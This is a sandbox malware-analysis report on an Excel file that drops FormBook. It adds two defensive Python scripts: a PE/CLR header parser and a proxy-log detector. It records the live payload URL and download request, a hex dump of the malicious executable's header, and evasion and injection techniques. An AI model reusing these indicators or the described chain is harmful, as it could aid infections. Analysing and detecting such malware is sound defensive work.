Analysis Report 5901777.xls

Overview

General Information

Sample Name: 5901777.xls
Analysis ID: 323692
MD5: 899e5af08f0794f0131adbf03f841045
SHA1: 242508434986d472b0b83387ec8d5d33888baa29
SHA256: 74b115a8b1f4e18d26b092dc965b60ad94dba931591d9913db219823d294904a
Tags: xls

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected FormBook
Bypasses PowerShell execution policy
Creates processes via WMI
Drops PE files to the user root directory
Injects a PE file into a foreign process
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Powershell drops PE file
Queues an APC in another process (thread injection)
Sigma detected: Executables Started in Suspicious Folder
Sigma detected: Execution in Non-Executable Folder
Sigma detected: Suspicious Program Location Process Starts
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Stores files to the Windows start menu directory
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection:

Antivirus detection for dropped file
Source: C:\Users\Public\oftmhayq.exe Avira: detection malicious, Label: HEUR/AGEN.1136389
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe Avira: detection malicious, Label: HEUR/AGEN.1136389
Multi AV Scanner detection for domain / URL
Source: sparepartiran.com Virustotal: Detection: 10%
Source: http://sparepartiran.com Virustotal: Detection: 10%
Multi AV Scanner detection for submitted file
Source: 5901777.xls Virustotal: Detection: 23%
Yara detected FormBook
Source: Yara match File source: 0000001E.00000002.483476185.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000002.484446432.0000000000FA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.469007949.0000000003B41000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.468368028.00000000043B1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.534769301.0000000001170000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.533904446.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.491474421.00000000033E1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 30.2.oftmhayq.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.2.oftmhayq.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 30.2.oftmhayq.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.2.oftmhayq.exe.400000.0.raw.unpack, type: UNPACKEDPE
Machine Learning detection for dropped file
Source: C:\Users\Public\oftmhayq.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 30.2.oftmhayq.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 29.2.oftmhayq.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe File opened: C:\Users\user\AppData\
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe File opened: C:\Users\user\
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\

Software Vulnerabilities:

Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: sparepartiran.com
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.3:49743 -> 162.223.88.131:80
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.3:49743 -> 162.223.88.131:80

Networking:

Downloads executable code via HTTP
Source: global traffic HTTP traffic detected (2 identical responses observed): HTTP/1.1 200 OK | Date: Fri, 27 Nov 2020 10:38:08 GMT | Server: Apache | Last-Modified: Fri, 27 Nov 2020 09:07:10 GMT | Accept-Ranges: bytes | Content-Length: 552960 | Keep-Alive: timeout=5, max=100 | Connection: Keep-Alive | Content-Type: application/x-msdownload
Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 0b be c0 5f 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 50 04 00 00 1e 04 00 00 00 00 00 4e 6f 04 00 00 20 00 00 00 80 04 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 08 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 f4 6e 04 00 57 00 00 00 00 80 04 00 d8 1b 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 08 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 54 4f 04 00 00 20 00 00 00 50 04 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 d8 1b 04 00 00 80 04 00 00 1c 04 00 00 52 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 a0 08 00 00 02 00 00 00 6e 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 6f 04 00 00 00 00 00 48 00 00 00 02 00 05 00 8c 4a 04 00 68 24 00 00 03 00 00 00 15 00 00 06 a0 30 00 00 ec 19 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 03 30 0a 00 11 00 00 00 00 00 00 00 02 16 15 2d 08 26 28 13 00 00 0a 2b 03 26 2b f6 2a 00 00 00 03 30 09 00 33 00 00 00 00 00 00 00 02 28 14 00 00 0a 02 1d 2d 13 26 02 19 2d 15 26 02 15 2d 17 26 02 28 05 00 00 06 2b 15 28 03 00 00 06 2b e7 28 04 00 00 06 2b e5 28 07 00 00 06 2b e3 2a 00 13 30 07 00 8a 00 00 00 01 00 00 11 20 d9 03 00 00 1c 2d 1b 26 73 15 00 00 0a 1a 2d 15 26 73 58 00 00 06 1b 2d 0f 26 06 6f 16 00 00 0a 2b 10 0d 2b e3 0a 2b e9 13 04 2b ee 17 28 17 00 00 0a 06 6f 18 00 00 0a 09 6a 32 f0 02 d0 2b 00 00 01 28 19 00 00 0a 72 01 00 00 70 17 8d 48 00 00 01 0b 07 16 d0 01 00 00 1b 28 19 00 00 0a a2 07 28 1a 00 00 0a 14 17 8d 2a 00 00 01 0c 08 16 11 04 6f 5b 00 00 06 a2 08 6f 1b 00 00 0a 74 2b 00 00 01 7d 01 00 00 04 2a 00 00 03 30 09 00 20 00 00 00 00 00 00 00 02 02 7b 01 00 00 04 72 0b 00 00 70 6f 1c 00 00 0a 1d 2d 04 26 26 2b 07 7d 02 00 00 04 2b 00 2a 13 30 09 00 75 00 00 00 02 00 00 11 02 7b 02 00 00 04 28 1d 00 00 0a 19 2d 0a 26
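The captured response body above is enough to triage the downloaded file without ever executing it. The following parser is an added example, not part of the Joe Sandbox report: it carries the first 0x250 bytes of the "Data Raw" dump transcribed into a byte string, walks the DOS header, COFF header, PE32 optional header, data directories and section table, and then reads the CLR (.NET) header that data directory 14 points to. From those fields it derives the facts a responder wants at a glance: the compile timestamp, whether the image is IL-only managed code, how much of the file is managed resources (where .NET crypters typically keep the encrypted payload), and whether the size declared by the section table agrees with the Content-Length header. The byte string and the 552960 constant are taken from this report; everything else (function names, the triage heuristics) is the author's choice for the example.

```python
"""Parse the PE/CLR header bytes captured in the HTTP response and derive triage facts."""
import struct
from datetime import datetime, timezone

# First 0x250 bytes of the 5901777.pdf.exe response body, transcribed from the
# "Data Raw" dump of the HTTP response in this report (32 bytes per line).
PE_HEADER = bytes.fromhex("""
4d5a9000 03000000 04000000 ffff0000 b8000000 00000000 40000000 00000000
00000000 00000000 00000000 00000000 00000000 00000000 00000000 80000000
0e1fba0e 00b409cd 21b8014c cd215468 69732070 726f6772 616d2063 616e6e6f
74206265 2072756e 20696e20 444f5320 6d6f6465 2e0d0d0a 24000000 00000000
50450000 4c010300 0bbec05f 00000000 00000000 e0000e01 0b010600 00500400
001e0400 00000000 4e6f0400 00200000 00800400 00004000 00200000 00020000
04000000 00000000 04000000 00000000 00c00800 00020000 00000000 02004085
00001000 00100000 00001000 00100000 00000000 10000000 00000000 00000000
f46e0400 57000000 00800400 d81b0400 00000000 00000000 00000000 00000000
00a00800 0c000000 00000000 00000000 00000000 00000000 00000000 00000000
00000000 00000000 00000000 00000000 00000000 00000000 00200000 08000000
00000000 00000000 08200000 48000000 00000000 00000000 2e746578 74000000
544f0400 00200000 00500400 00020000 00000000 00000000 00000000 20000060
2e727372 63000000 d81b0400 00800400 001c0400 00520400 00000000 00000000
00000000 40000040 2e72656c 6f630000 0c000000 00a00800 00020000 006e0800
00000000 00000000 00000000 40000042 00000000 00000000 00000000 00000000
306f0400 00000000 48000000 02000500 8c4a0400 68240000 03000000 15000006
a0300000 ec190400 00000000 00000000 00000000 00000000 00000000 00000000
00000000 00000000 00000000 00000000
""")
CONTENT_LENGTH = 552960          # Content-Length header of the same response
IMAGE_DIR_CLR = 14               # data directory index of the CLR runtime header
COMIMAGE_FLAGS_ILONLY = 0x1      # CLR header flag: no native code in the image


def parse_pe(data):
    """Return COFF/optional-header fields, data directories and sections of a PE32 image."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    machine, nsections, timestamp, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    if struct.unpack_from("<H", data, opt)[0] != 0x10B:
        raise ValueError("only PE32 (0x10b) handled here")
    entry = struct.unpack_from("<I", data, opt + 16)[0]
    image_base = struct.unpack_from("<I", data, opt + 28)[0]
    size_of_image = struct.unpack_from("<I", data, opt + 56)[0]
    ndirs = struct.unpack_from("<I", data, opt + 92)[0]
    dirs = [struct.unpack_from("<II", data, opt + 96 + 8 * i) for i in range(ndirs)]
    sections = []
    for i in range(nsections):
        name, vsize, va, rawsize, rawptr, _, _, _, _, chars = struct.unpack_from(
            "<8sIIIIIIHHI", data, opt + opt_size + 40 * i)
        sections.append({"name": name.rstrip(b"\0").decode(), "va": va, "vsize": vsize,
                         "rawptr": rawptr, "rawsize": rawsize, "chars": chars})
    return {"machine": machine, "nsections": nsections, "timestamp": timestamp, "entry": entry,
            "image_base": image_base, "size_of_image": size_of_image, "dirs": dirs,
            "sections": sections}


def rva_to_offset(sections, rva):
    """Map a virtual address to a file offset using the section table."""
    for s in sections:
        if s["va"] <= rva < s["va"] + max(s["vsize"], s["rawsize"]):
            return rva - s["va"] + s["rawptr"]
    raise ValueError("RVA 0x%x not inside any section" % rva)


def parse_clr(data, pe):
    """Return the IMAGE_COR20_HEADER fields, or None if the image is not managed."""
    rva, _size = pe["dirs"][IMAGE_DIR_CLR]
    if rva == 0:
        return None
    off = rva_to_offset(pe["sections"], rva)
    cb, major, minor, md_rva, md_size, flags, ep_token, res_rva, res_size = struct.unpack_from(
        "<IHHIIIIII", data, off)
    return {"cb": cb, "runtime": (major, minor), "md_rva": md_rva, "md_size": md_size,
            "flags": flags, "ep_token": ep_token, "res_rva": res_rva, "res_size": res_size}


def triage(data=PE_HEADER, content_length=CONTENT_LENGTH):
    """Derive responder-facing facts from the headers alone."""
    pe = parse_pe(data)
    clr = parse_clr(data, pe)
    declared = max(s["rawptr"] + s["rawsize"] for s in pe["sections"])
    facts = {
        "compile_time": datetime.fromtimestamp(pe["timestamp"], timezone.utc).isoformat(),
        "declared_size": declared,
        "size_matches_content_length": declared == content_length,
        "is_dotnet": clr is not None,
        "il_only": bool(clr and clr["flags"] & COMIMAGE_FLAGS_ILONLY),
        # share of the whole file taken by managed resources (payload carrier in .NET crypters)
        "managed_resource_share": round(clr["res_size"] / content_length, 2) if clr else 0.0,
        "entry_token": clr["ep_token"] if clr else None,
    }
    return pe, clr, facts


if __name__ == "__main__":
    pe, clr, facts = triage()
    print([s["name"] for s in pe["sections"]], hex(pe["entry"]))
    for k, v in facts.items():
        print("%-28s %s" % (k, hex(v) if isinstance(v, int) and not isinstance(v, bool) else v))
```

The compile timestamp decodes to 2020-11-27 08:51:23 UTC, sixteen minutes before the server's Last-Modified value and under two hours before the sandbox fetched it, which is the usual build-upload-deliver cadence of a crypter service. The CLR header flags (ILONLY | 32BITREQUIRED) and a managed-resource block that accounts for roughly half of the file are consistent with the "Antivirus or Machine Learning detection for unpacked file" entries further down: the outer .NET stage is a loader and the FormBook code only appears in memory.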
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 162.223.88.131
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: COLOUPUS
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected (4 identical requests observed): GET /js/2Q/5901777.pdf.exe HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1 | Host: sparepartiran.com | Connection: Keep-Alive
Source: unknown DNS traffic detected: queries for: sparepartiran.com
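The signature name above is the sandbox's generic label; the User-Agent it matched is not a browser's but the default one PowerShell's web cmdlets send, and it names the PowerShell build in clear text. Combined with the double extension in the path (.pdf.exe) and an application/x-msdownload response, that is a high-fidelity proxy-log detection. The script below is an added example, not part of the report: it runs that logic over constructed proxy-log lines in a simple key=value form (the first line reproduces the request and response fields observed here; the other lines are invented decoys), and returns the hits with the reasons they fired.

```python
"""Flag proxy-log records that match the PowerShell-driven executable download seen in this report."""
import re

# Constructed proxy-log lines (not sandbox output). Line 1 carries the values of the real
# request/response in this report; the rest are invented benign or partial-match decoys.
SAMPLE_LOGS = [
    'ts=2020-11-27T10:38:08Z src=192.168.2.3 method=GET host=sparepartiran.com '
    'uri=/js/2Q/5901777.pdf.exe ua="Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) '
    'WindowsPowerShell/5.1.17134.1" status=200 ctype=application/x-msdownload bytes=552960',
    'ts=2020-11-27T10:40:01Z src=192.168.2.3 method=GET host=www.example.org uri=/index.html '
    'ua="Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/86.0" status=200 ctype=text/html bytes=5120',
    'ts=2020-11-27T10:41:15Z src=192.168.2.7 method=GET host=download.example.net uri=/tools/setup.exe '
    'ua="Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1" '
    'status=200 ctype=application/octet-stream bytes=1048576',
    'ts=2020-11-27T10:42:30Z src=192.168.2.9 method=GET host=cdn.example.com uri=/report.pdf '
    'ua="Mozilla/5.0 (Windows NT 10.0) Firefox/83.0" status=200 ctype=application/pdf bytes=204800',
    'ts=2020-11-27T10:44:12Z src=192.168.2.9 method=GET host=files.example.com uri=/invoice.pdf.exe '
    'ua="Mozilla/5.0 (Windows NT 10.0) Firefox/83.0" status=200 ctype=application/x-msdownload bytes=70000',
]

KV = re.compile(r'(\w+)=("[^"]*"|\S+)')            # key=value, value may be double-quoted
EXE_TYPES = {"application/x-msdownload", "application/x-dosexec",
             "application/vnd.microsoft.portable-executable"}
EXE_EXT = re.compile(r"\.(exe|dll|scr|cpl)$", re.I)
DOUBLE_EXT = re.compile(r"\.(pdf|docx?|xlsx?|pptx?|txt|jpe?g|png)\.(exe|dll|scr|cpl)$", re.I)


def parse_line(line):
    """Turn one key=value log line into a dict, stripping quotes from quoted values."""
    return {k: v.strip('"') for k, v in KV.findall(line)}


def score(rec):
    """Return (severity, reasons) for one parsed record."""
    ua, uri, ctype = rec.get("ua", ""), rec.get("uri", ""), rec.get("ctype", "").lower()
    reasons = []
    if "WindowsPowerShell/" in ua:                 # Invoke-WebRequest / WebClient default UA
        reasons.append("powershell-user-agent")
    if ctype in EXE_TYPES or EXE_EXT.search(uri):  # server says PE, or path says PE
        reasons.append("executable-download")
    if DOUBLE_EXT.search(uri):                     # document-looking name with PE extension
        reasons.append("double-extension")
    if {"powershell-user-agent", "executable-download"} <= set(reasons):
        severity = "high"                          # script engine pulling a PE: the chain seen here
    elif reasons:
        severity = "medium"
    else:
        severity = "none"
    return severity, reasons


def scan(lines):
    """Run score() over log lines and return the records that fired, in input order."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        severity, reasons = score(rec)
        if severity != "none":
            hits.append({"ts": rec["ts"], "src": rec["src"], "host": rec["host"],
                         "uri": rec["uri"], "severity": severity, "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOGS):
        print(hit["severity"].upper(), hit["src"], hit["host"] + hit["uri"], ",".join(hit["reasons"]))
```

Two caveats when deploying this. Administrators do use PowerShell to fetch installers, so the "high" tier should be reviewed against an allow-list of software-distribution hosts rather than blocked outright, and the User-Agent is trivially changed by the attacker (Invoke-WebRequest accepts -UserAgent), so the content-type and double-extension checks are the ones that survive a minor retooling.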
Source: powershell.exe, 00000014.00000002.416291005.000001D20A361000.00000004.00000001.sdmp, powershell.exe, 00000015.00000002.443905156.000001F6E4B80000.00000004.00000001.sdmp, explorer.exe, 0000001F.00000000.512239339.0000000008A14000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: oftmhayq.exe, 00000019.00000003.423991911.00000000063AB000.00000004.00000001.sdmp String found in binary or memory: http://en.wikip
Source: oftmhayq.exe, 00000018.00000002.474381892.0000000006D32000.00000004.00000001.sdmp, oftmhayq.exe, 00000018.00000003.421069642.0000000005A6D000.00000004.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmp String found in binary or memory: http://fontfabrik.com
Source: powershell.exe, 00000014.00000002.441451154.000001D21A613000.00000004.00000001.sdmp, powershell.exe, 00000015.00000002.426042262.000001F6CC6A1000.00000004.00000001.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000015.00000002.426042262.000001F6CC6A1000.00000004.00000001.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000014.00000002.417757866.000001D20A471000.00000004.00000001.sdmp, powershell.exe, 00000015.00000002.425672375.000001F6CC491000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000014.00000002.434703367.000001D20B78E000.00000004.00000001.sdmp String found in binary or memory: http://sparepartiran.c
Source: powershell.exe, 00000014.00000002.434548786.000001D20B76E000.00000004.00000001.sdmp, powershell.exe, 00000015.00000002.431327100.000001F6CD016000.00000004.00000001.sdmp String found in binary or memory: http://sparepartiran.com
Source: powershell.exe, 00000015.00000002.433516174.000001F6CD269000.00000004.00000001.sdmp String found in binary or memory: http://sparepartiran.com/js/2Q/5
Source: powershell.exe, 00000015.00000002.437681363.000001F6CD8C3000.00000004.00000001.sdmp String found in binary or memory: http://sparepartiran.com/js/2Q/5901777.pdf.exe
Source: powershell.exe, 00000014.00000002.421247257.000001D20A682000.00000004.00000001.sdmp, powershell.exe, 00000015.00000002.426042262.000001F6CC6A1000.00000004.00000001.sdmp String found in binary or memory: http://sparepartiran.com/js/2Q/5901777.pdf.exe0yRO
Source: powershell.exe, 00000014.00000002.417383854.000001D20A3F4000.00000004.00000001.sdmp String found in binary or memory: http://sparepartiran.com/js/2Q/5901777.pdf.exeers
Source: powershell.exe, 00000014.00000002.434548786.000001D20B76E000.00000004.00000001.sdmp String found in binary or memory: http://sparepartiran.comx
Source: oftmhayq.exe, 00000018.00000002.472455685.0000000005C10000.00000002.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000015.00000002.426042262.000001F6CC6A1000.00000004.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: oftmhayq.exe, 00000019.00000003.426739016.00000000063CD000.00000004.00000001.sdmp String found in binary or memory: http://www.ascendercorp.com/typedesigners.html:
Source: oftmhayq.exe, 00000018.00000003.425705477.0000000005A3A000.00000004.00000001.sdmp String found in binary or memory: http://www.carterandcone.com
Source: oftmhayq.exe, 00000018.00000003.425705477.0000000005A3A000.00000004.00000001.sdmp String found in binary or memory: http://www.carterandcone.comR
Source: oftmhayq.exe, 00000018.00000003.425705477.0000000005A3A000.00000004.00000001.sdmp String found in binary or memory: http://www.carterandcone.comegu
Source: oftmhayq.exe, 00000018.00000002.474381892.0000000006D32000.00000004.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmp String found in binary or memory: http://www.carterandcone.coml
Source: oftmhayq.exe, 00000018.00000002.474381892.0000000006D32000.00000004.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers
Source: oftmhayq.exe, 00000018.00000002.474381892.0000000006D32000.00000004.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
Source: oftmhayq.exe, 00000018.00000003.428462060.0000000005A6B000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/O
Source: oftmhayq.exe, 00000018.00000002.472455685.0000000005C10000.00000002.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: oftmhayq.exe, 00000018.00000002.474381892.0000000006D32000.00000004.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: oftmhayq.exe, 00000018.00000003.429554152.0000000005A6B000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.htmlj
Source: oftmhayq.exe, 00000018.00000002.472455685.0000000005C10000.00000002.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
Source: oftmhayq.exe, 00000018.00000002.472455685.0000000005C10000.00000002.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
Source: oftmhayq.exe, 00000018.00000002.474381892.0000000006D32000.00000004.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
Source: oftmhayq.exe, 00000019.00000002.471212112.00000000063A9000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designersG6
Source: oftmhayq.exe, 00000019.00000002.471212112.00000000063A9000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.coma77
Source: oftmhayq.exe, 00000019.00000002.471212112.00000000063A9000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.comldva
Source: oftmhayq.exe, 00000018.00000003.419516812.0000000005A6D000.00000004.00000001.sdmp, oftmhayq.exe, 00000018.00000003.419609379.0000000005A6D000.00000004.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmp String found in binary or memory: http://www.fonts.com
Source: oftmhayq.exe, 00000018.00000003.419447690.0000000005A6D000.00000004.00000001.sdmp String found in binary or memory: http://www.fonts.comat
Source: oftmhayq.exe, 00000018.00000002.474381892.0000000006D32000.00000004.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, oftmhayq.exe, 00000019.00000003.423991911.00000000063AB000.00000004.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn
Source: oftmhayq.exe, 00000018.00000003.424365835.0000000005A38000.00000004.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/
Source: oftmhayq.exe, 00000018.00000002.474381892.0000000006D32000.00000004.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: oftmhayq.exe, 00000018.00000002.474381892.0000000006D32000.00000004.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: oftmhayq.exe, 00000018.00000003.424456304.0000000005A37000.00000004.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cnn-u
Source: oftmhayq.exe, 00000018.00000003.423993163.0000000005A37000.00000004.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cnp
Source: oftmhayq.exe, 00000019.00000003.431627701.00000000063CD000.00000004.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/
Source: oftmhayq.exe, 00000018.00000002.472455685.0000000005C10000.00000002.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
